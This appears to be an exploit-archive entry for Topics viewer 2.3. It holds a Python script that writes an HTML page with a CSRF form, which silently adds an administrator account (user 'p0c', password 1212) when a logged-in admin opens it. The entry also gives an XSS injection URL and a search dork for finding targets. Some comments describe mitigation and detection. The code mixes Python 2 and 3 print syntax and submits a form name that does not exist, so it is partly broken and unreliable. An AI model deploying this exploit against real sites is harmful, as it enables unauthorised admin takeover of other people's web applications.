Topics viewer v 2.3 csrf (Add Admin) / XSS Vulnerabilities

2012-05-14T00:00:00
ID 1337DAY-ID-18266
Type zdt
Reporter Cyber-Crystal
Modified 2012-05-14T00:00:00

Description

Exploit for php platform in category web applications

                                        
#!/usr/bin/env python
########################################################################
# Title    : Topics viewer v 2.3 csrf Add Admin and XSS
# Author   : Cyber-Crystal
# Version  : 2.3
# Homepage : http://nilehoster.com/default/topicsviewer
# Dork     : "Programmed by : Nilehoster.com"
# Tested on: Win/7
# Based on POC : http://vb.ehcommunity.com/showthread.php?t=70682
# CVE : 14 May 2012
#---------------------------------------------------------------------
# ^_^ > snc0pe | secure-x41 | Dmar al3noOoz | al-swisre || All
# 
#
# Xss Exploit is Here :
# http://localhost//admincp/edit_block.php?id=XSS

import sys
import string
import os


def banner():
	"""Print the usage banner (tool name and expected command line) to stdout.

	Returns nothing; the text is identical to the original triple-quoted literal,
	including its trailing whitespace on the usage line.
	"""
	usage_lines = [
		"",
		"----------------------------------",
		"Topics viewer v 2.3 csrf Add Admin",
		"----------------------------------",
		"",
		"[+] python Exploit.py http://www.exp.com  \t",
		"",
	]
	print("\n".join(usage_lines))
# Clear the terminal before any output; on Windows the console colour is also
# changed. Both branches shell out via os.system with fixed command strings.
if os.name == "nt":
	os.system("cls")
	os.system("color e")
else :
	os.system('clear')
	
# Without a target argument, show the usage banner and stop.
if len(sys.argv) < 2:
	banner()
	sys.exit()
	
# Reduce argv[1] to a bare host: the "http://" prefix and every "/" are removed,
# so any path component given by the caller is dropped, not preserved.
vic = sys.argv[1].replace("http://","").replace("/","")
# NOTE: `file` shadows the builtin of the same name and the handle is never
# closed explicitly; the file is only flushed when the interpreter exits.
file = open("Exploit.html", "w")


# Static HTML page containing a POST form aimed at the application's
# add-admin action on admincp/main.php. If an authenticated administrator
# loads this page, the browser attaches their existing session cookies to the
# POST — the CSRF condition this page describes. Per the author's inline
# comment, the "verification" field accepts any number, i.e. it is not a
# per-session anti-CSRF token. Mitigation on the application side is a
# server-verified, unpredictable CSRF token on every state-changing admincp
# request plus SameSite session cookies; on the detection side, POSTs to
# admincp/main.php?op=add-admin whose Origin/Referer is not the site's own
# host are the signal to alert on.
db = ("<html>\n"
"<body>\n"
"<form action='http://"+vic+"/admincp/main.php?op=add-admin' method='post' name='sdf'>\n"
"<input type='text' name='u_name' value='p0c' />\n"
"<input type='text' name='u_m_pass' value='1212' />\n"
"<input type='text' name='u_email' value='[email protected]' />\n"
"<input type='text' name='verification' value='101010'/> <!-- Any number-->\n"
"<script>document.xss.submit();</script><br />\n"
"<input type='submit' value='Exploit'/>\n"
"</form>\n"
"</body>\n"
"</html>\n")
	
# Write the page to Exploit.html in the current directory and echo the
# hard-coded credentials the form carries. These are Python 2 print
# statements; the runtime strings (including the "Createing" spelling) are
# program output and are left exactly as written.
file.write(db)
print "Createing ...\n"
print "user Name And Password ...\n"
print "User : p0c \t Pass : 1212"

# The End


